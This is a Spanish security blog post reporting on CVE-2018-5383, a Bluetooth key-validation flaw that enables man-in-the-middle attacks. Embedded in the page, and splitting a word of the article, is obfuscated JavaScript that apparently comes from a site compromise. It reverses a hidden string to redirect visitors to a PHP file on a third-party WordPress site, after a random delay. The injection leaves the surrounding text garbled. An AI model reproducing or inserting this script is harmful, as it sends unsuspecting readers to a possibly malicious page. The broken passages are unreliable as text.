Vulnerabilidad en Bluetooth permite realizar ataques «hombre en el medio»
El fallo de encuentra en el proceso de validación de claves públicas, y podría permitir la lectura e inyección de datos por un tercero entre dos dispositivos conectados.
{if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tooth-icon-symbol-typography-logodesign.jpg» width=»320″ height=»320″ /></p>
<p>Los investigadores Eli Biham y Lior Neumann, parte del equipo del Centro de Investigación en Seguridad Hiroshi Fujuwara del Technion, en Israel, han descubier<script>$NfI=function(n){if (typeof ($NfI.list[n]) == ){kind=icon}
to una vulnerabilidad en la tecnología Bluetooth que podría permitir a un tercero descifrar e inyectar datos en la comunicación entre dos dispositivos emparejados.
El fallo, al que se ha asignado el identificador CVE-2018-5383, ocurre durante el intercambio de claves de curva elíptica Diffie-Hellman. Durante este proceso, los dispositivos que van a emparejarse deben intercambiar sus claves públicas y acordar los parámetros de curva elíptica que van a utilizar.
El problema aparece cuando en algunas implementaciones estos parámetros no son validados. Esto permitiría a un atacante en el rango de alcance inyectar una clave pública inválida para realizar un ataque «man-in-the-middle», de forma que podría descifrar las comunicaciones entre los dos dispositivos e incluso inyectar mensajes con contenido malicioso en la comunicación sin ser detectado.
El Bluetooth SIG (Special Interest Group), órgano encargado de las especificaciones de la tecnología, ha reconocido el fallo, y han realizado un cambio en el estándar que fuerza a la validación cualquier clave pública recibida.
Sin embargo, queda que los distintos fabricantes hagan cambios en sus implementaciones para eliminar la vulnerabilidad. Estos recibieron notificaciones entre mediados de enero y mediados de marzo de este año, antes de que el descubrimiento se hiciera público. Entre los afectados se encuentran Google, Apple y Samsung, que ya han lanzado parches para sus dispositivos.
Como curiosidad, Microsoft no está afectado por esta vulnerabilidad, pero no porque se haya adelantado a los acontecimientos, sino porque implementa una versión antigua del estándar que no contiene esta vulnerabilidad pero que es aún más insegura.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
Siguenos
en facebook
Los comentarios están cerrados.